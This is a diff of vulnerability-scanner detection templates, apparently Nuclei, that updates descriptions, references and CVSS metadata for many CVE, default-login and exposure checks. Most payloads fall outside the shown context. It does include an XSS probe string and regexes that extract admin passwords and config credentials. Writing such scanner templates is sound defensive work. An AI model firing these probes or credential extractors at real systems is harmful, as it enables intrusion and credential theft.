||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2020-12720
|
||||
cwe-id: CWE-89,CWE-306
|
||||
tags: cve,cve2020,vbulletin,sqli
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -28,3 +30,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "vbulletinrce"
|
||||
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
|
|
@ -1,16 +1,18 @@
|
|||
id: CVE-2020-14883
|
||||
|
||||
info:
|
||||
name: Oracle WebLogic Server Administration Console Handle RCE
|
||||
name: Oracle WebLogic Server Administration Console Remote Code Execution
|
||||
author: pdteam
|
||||
severity: high
|
||||
description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
|
||||
tags: cve,cve2020,oracle,rce,weblogic
|
||||
description: The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.20
|
||||
cve-id: CVE-2020-14883
|
||||
tags: cve,cve2020,oracle,rce,weblogic
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
@ -34,3 +36,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
|
@ -1,17 +1,19 @@
|
|||
id: CVE-2020-17362
|
||||
|
||||
info:
|
||||
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
|
||||
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
|
||||
tags: cve,cve2020,wordpress,xss,wp-plugin
|
||||
description: "Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php."
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-17362
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-17362
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2020,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -38,3 +40,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/04/04
|
||||
|
|
|
@ -1,17 +1,19 @@
|
|||
id: CVE-2020-17496
|
||||
|
||||
info:
|
||||
name: vBulletin Pre-Auth RCE
|
||||
name: vBulletin Pre-Auth Remote Command Execution
|
||||
author: pussycat0x
|
||||
severity: critical
|
||||
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
|
||||
description: |
|
||||
vBulletin 5.5.4 through 5.6.2 allow remote command execution (RCE) via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
|
||||
tags: cve,cve2020,vbulletin,rce
|
||||
description: "vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759."
|
||||
reference:
|
||||
- https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-17496
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2020-17496
|
||||
cwe-id: CWE-74
|
||||
tags: cve,cve2020,vbulletin,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -31,3 +33,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
|
|
@ -1,18 +1,20 @@
|
|||
id: CVE-2020-35774
|
||||
|
||||
info:
|
||||
name: Twitter Server XSS
|
||||
name: twitter-server Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: |
|
||||
server/handler/HistogramQueryHandler.scala in Twitter TwitterServer (aka twitter-server) before 20.12.0, in some configurations, allows XSS via the /histograms endpoint.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35774
|
||||
tags: cve,cve2020,xss,twitter-server
|
||||
twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala.
|
||||
reference:
|
||||
- https://advisory.checkmarx.net/advisory/CX-2020-4287
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35774
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-35774
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2020,xss,twitter-server
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -22,9 +24,9 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
@ -34,3 +36,5 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
# Enhanced by mp on 2022/04/04
|
||||
|
|
|
@ -5,15 +5,16 @@ info:
|
|||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
resetpassword method of the Auth controller,
|
||||
which is responsible for changing the user password using the reset token.
|
||||
reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
|
||||
tags: cve,cve2020,nosqli,sqli,cockpit,injection
|
||||
Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
|
||||
reference:
|
||||
- https://swarm.ptsecurity.com/rce-cockpit-cms/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35847
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2020-35847
|
||||
cwe-id: CWE-89
|
||||
tags: cve,cve2020,nosqli,sqli,cockpit,injection
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
@ -33,3 +34,5 @@ requests:
|
|||
part: body
|
||||
regex:
|
||||
- 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9]+)"'
|
||||
|
||||
# Enhanced by mp on 2022/04/04
|
||||
|
|
|
@ -1,16 +1,19 @@
|
|||
id: CVE-2020-7247
|
||||
|
||||
info:
|
||||
name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
|
||||
tags: cve,cve2020,smtp,opensmtpd,network,rce,oast
|
||||
reference:
|
||||
- https://www.openwall.com/lists/oss-security/2020/01/28/3
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-7247
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2020-7247
|
||||
cwe-id: CWE-78,CWE-755
|
||||
description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation."
|
||||
description: "OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation."
|
||||
tags: cve,cve2020,smtp,opensmtpd,network,rce,oast
|
||||
|
||||
network:
|
||||
- inputs:
|
||||
|
@ -42,3 +45,5 @@ network:
|
|||
part: raw
|
||||
words:
|
||||
- "Message accepted for delivery"
|
||||
|
||||
# Enhanced by mp on 2022/04/04
|
||||
|
|
|
@ -5,14 +5,16 @@ info:
|
|||
author: pikpikcu
|
||||
severity: high
|
||||
description: |
|
||||
When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.
|
||||
reference: https://github.com/apache/skywalking/pull/4639
|
||||
tags: cve,cve2020,sqli,skywalking
|
||||
When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection vulnerability which allows access to unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.
|
||||
reference:
|
||||
- https://github.com/apache/skywalking/pull/4639
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-9483
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2020-9483
|
||||
cwe-id: CWE-89
|
||||
tags: cve,cve2020,sqli,skywalking
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
@ -41,3 +43,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-9484
|
||||
|
||||
info:
|
||||
name: Apache Tomcat RCE by deserialization
|
||||
name: Apache Tomcat Remote Command Execution
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: |
|
||||
|
@ -11,7 +11,9 @@ info:
|
|||
c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and
|
||||
d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control.
|
||||
Note that all of conditions a) to d) must be true for the attack to succeed.
|
||||
reference: http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-9484
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.00
|
||||
|
@ -39,3 +41,5 @@ requests:
|
|||
- "ObjectInputStream"
|
||||
- "PersistentManagerBase"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/04/04
|
||||
|
|
|
@ -1,20 +1,20 @@
|
|||
id: CVE-2021-20114
|
||||
|
||||
info:
|
||||
name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor
|
||||
name: TCExam <= 14.8.1 Sensitive Information Exposure
|
||||
author: push4d
|
||||
severity: high
|
||||
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files.
|
||||
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.
|
||||
reference:
|
||||
- https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20114
|
||||
tags: cve,cve2021,tcexam,disclosure,exposure
|
||||
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2021-20114
|
||||
cwe-id: CWE-200
|
||||
tags: cve,cve2021,tcexam,disclosure,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
@ -32,3 +32,6 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
|
||||
description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2021-54
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
|
||||
|
@ -52,3 +52,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'
|
||||
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
|
@ -1,20 +1,21 @@
|
|||
id: CVE-2021-21234
|
||||
|
||||
info:
|
||||
name: Spring Boot Actuator Logview - Directory Traversal
|
||||
name: Spring Boot Actuator Logview Directory Traversal
|
||||
author: gy741,pikpikcu
|
||||
severity: high
|
||||
description: spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability.
|
||||
description: |
|
||||
spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package "eu.hinsch:spring-boot-actuator-logview".
|
||||
reference:
|
||||
- https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234
|
||||
- https://github.com/cristianeph/vulnerability-actuator-log-viewer
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21234
|
||||
tags: cve,cve2021,springboot,lfi,actuator
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 7.70
|
||||
cve-id: CVE-2021-21234
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2021,springboot,lfi,actuator
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -40,3 +41,5 @@ requests:
|
|||
- "contains(body, 'extensions')"
|
||||
- "status_code == 200"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2021-28854
|
||||
|
||||
info:
|
||||
name: VICIdial - Multiple sensitive Information disclosure
|
||||
name: VICIdial Sensitive Information Disclosure
|
||||
author: pdteam
|
||||
severity: high
|
||||
description: VICIdial's Web Client contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/2021.
|
||||
description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems.
|
||||
reference: https://github.com/JHHAX/VICIdial
|
||||
classification:
|
||||
cve-id: CVE-2021-28854
|
||||
|
@ -30,3 +30,5 @@ requests:
|
|||
words:
|
||||
- 'vdc_db_query'
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/04/06
|
||||
|
|
|
@ -1,19 +1,20 @@
|
|||
id: CVE-2021-3019
|
||||
|
||||
info:
|
||||
name: Lanproxy Directory Traversal
|
||||
name: ffay lanproxy Directory Traversal
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.
|
||||
description: "ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet."
|
||||
reference:
|
||||
- https://github.com/ffay/lanproxy/commits/master
|
||||
- https://github.com/maybe-why-not/lanproxy/issues/1
|
||||
tags: cve,cve2021,lanproxy,lfi
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3019
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2021-3019
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2021,lanproxy,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -36,3 +37,5 @@ requests:
|
|||
- "config.admin.password"
|
||||
condition: and
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/04/04
|
||||
|
|
|
@ -1,20 +1,20 @@
|
|||
id: CVE-2021-3293
|
||||
|
||||
info:
|
||||
name: Emlog 5.3.1 Path Disclosure
|
||||
description: emlog v5.3.1 has full path disclosure vulnerability in t/index.php, which allows an attacker to see the path to the webroot/file.
|
||||
name: emlog 5.3.1 Path Disclosure
|
||||
description: "emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file."
|
||||
author: h1ei1
|
||||
severity: high
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3293
|
||||
- https://github.com/emlog/emlog/issues/62
|
||||
- https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md
|
||||
tags: cve,cve2021,emlog,fpd
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3293
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2021-3293
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2021,emlog,fpd
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -34,3 +34,5 @@ requests:
|
|||
- "on line"
|
||||
- "expects parameter"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/04/04
|
||||
|
|
|
@ -35,4 +35,4 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/28
|
||||
# Enhanced by cs on 2022/04/01
|
||||
|
|
|
@ -1,14 +1,16 @@
|
|||
id: visual-tools-dvr-rce
|
||||
id: CVE-2021-42071
|
||||
|
||||
info:
|
||||
name: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
|
||||
name: Visual Tools DVR VX16 4.2.28.0 Unauthenticated OS Command Injection
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
|
||||
description: Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50098
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-42071
|
||||
classification:
|
||||
cve-id: CVE-2021-42071
|
||||
tags: visualtools,rce,oast,injection
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
|
@ -5,7 +5,6 @@ info:
|
|||
author: davidmckennirey
|
||||
severity: high
|
||||
description: Versa Networks SD-WAN application default admin credentials were discovered.
|
||||
tags: default-login,versa,sdwan
|
||||
reference:
|
||||
- https://versa-networks.com/products/sd-wan.php
|
||||
classification:
|
||||
|
@ -13,6 +12,7 @@ info:
|
|||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
tags: default-login,versa,sdwan
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -52,4 +52,4 @@ requests:
|
|||
- "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')"
|
||||
negative: true
|
||||
|
||||
# Enhanced by mp on 2022/03/11
|
||||
# Enhanced by mp on 2022/04/06
|
||||
|
|
|
@ -4,8 +4,7 @@ info:
|
|||
name: VisionHub Default Login
|
||||
author: Techryptic (@Tech)
|
||||
severity: high
|
||||
description: VisionHub application default admin credentials were discovered.
|
||||
tags: visionhub,default-login
|
||||
description: VisionHub application default admin credentials were accepted.
|
||||
reference:
|
||||
- https://www.qognify.com/products/visionhub/
|
||||
classification:
|
||||
|
@ -13,6 +12,7 @@ info:
|
|||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
tags: visionhub,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -39,4 +39,4 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/13
|
||||
# Enhanced by mp on 2022/04/06
|
||||
|
|
|
@ -5,7 +5,6 @@ info:
|
|||
author: pdteam
|
||||
description: WebLogic default login credentials were discovered.
|
||||
severity: high
|
||||
tags: default-login,weblogic
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password
|
||||
- https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/
|
||||
|
@ -14,6 +13,7 @@ info:
|
|||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
tags: default-login,weblogic
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -65,4 +65,4 @@ requests:
|
|||
status:
|
||||
- 302
|
||||
|
||||
# Enhanced by mp on 2022/03/14
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
|
@ -8,12 +8,12 @@ info:
|
|||
reference:
|
||||
- https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
|
||||
- https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/
|
||||
tags: default-login,wso2
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
tags: default-login,wso2
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -40,4 +40,4 @@ requests:
|
|||
part: header
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/03/13
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
|
@ -7,12 +7,12 @@ info:
|
|||
description: "Zmanda default admin credentials admin:admin were discovered."
|
||||
reference:
|
||||
- https://www.zmanda.com
|
||||
tags: zmanda,default-login
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
tags: zmanda,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -41,4 +41,4 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/13
|
||||
# Enhanced by mp on 2022/04/04
|
||||
|
|
|
@ -1,9 +1,17 @@
|
|||
id: iotawatt-app-exposure
|
||||
|
||||
info:
|
||||
name: IoTaWatt Configuration app
|
||||
name: IoTaWatt Configuration App Exposure
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: unauthenticated IoTaWatt energy monitor leads to upload to any of several third-party energy websites/database
|
||||
description: An IoTaWatt configuration app was discovered. Unauthenticated access to an IoTaWatt energy monitor could give a malicious attacker the means to upload to any of several third-party energy websites/database.
|
||||
reference:
|
||||
- https://docs.iotawatt.com/en/master/passConfig.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
metadata:
|
||||
fofa-query: 'app="IoTaWatt-Configuration-app"'
|
||||
tags: iot,exposure
|
||||
|
@ -15,14 +23,15 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<h3>Configure IoTaWatt Device</h3>'
|
||||
- '<title>IoTaWatt Configuration app</title>'
|
||||
condition: and
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
|
|
@ -2,12 +2,11 @@ id: aem-userinfo-servlet
|
|||
|
||||
info:
|
||||
author: DhiyaneshDk
|
||||
name: AEM UserInfo Servlet
|
||||
name: AEM UserInfo Servlet Credentials Exposure
|
||||
severity: info
|
||||
description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.
|
||||
description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node."
|
||||
tags: aem,bruteforce
|
||||
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
|
@ -29,3 +28,5 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
|
@ -1,11 +1,16 @@
|
|||
id: phpmyadmin-misconfiguration
|
||||
|
||||
info:
|
||||
name: Sensitive data exposure
|
||||
name: phpmyadmin Data Exposure
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: Unauthenticated phpmyadmin leads to exposure of sensitive information
|
||||
severity: medium
|
||||
description: An unauthenticated instance of phpmyadmin was discovered, which could be leveraged to access sensitive information.
|
||||
reference: https://www.exploit-db.com/ghdb/6997
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id:
|
||||
cwe-id: CWE-200
|
||||
tags: phpmyadmin,misconfig
|
||||
|
||||
requests:
|
||||
|
@ -26,3 +31,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/04/06
|
||||
|
|
|
@ -1,10 +1,12 @@
|
|||
id: unauthenticated-zipkin
|
||||
|
||||
info:
|
||||
name: Unauthenticated Zipkin
|
||||
name: Zipkin Discovery
|
||||
author: dhiyaneshDk
|
||||
severity: high
|
||||
description: Unauthenticated access to Zipkin
|
||||
description: Unauthenticated access to Zipkin was discovered.
|
||||
reference:
|
||||
- https://zipkin.io/
|
||||
tags: unauth
|
||||
|
||||
requests:
|
||||
|
@ -29,3 +31,5 @@ requests:
|
|||
- defaultLookback
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/04/06
|
||||
|
|
|
@ -3,9 +3,14 @@ id: neos-detect
|
|||
info:
|
||||
name: Neos CMS detection
|
||||
author: k11h-de
|
||||
description: some Neos websites remove the X-Flow-Powered Header, but they usually all have a comment line at the top of the body
|
||||
description: Neos CMS was detected.
|
||||
severity: info
|
||||
reference: https://github.com/neos/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cve-id:
|
||||
cwe-id: CWE-200
|
||||
tags: tech,neos,cms
|
||||
|
||||
requests:
|
||||
|
@ -24,3 +29,5 @@ requests:
|
|||
- type: kval
|
||||
kval:
|
||||
- 'x_flow_powered'
|
||||
|
||||
# Enhanced by mp on 2022/04/01
|
||||
|
|
|
@ -1,26 +0,0 @@
|
|||
id: netgear-wnap320-rce
|
||||
|
||||
info:
|
||||
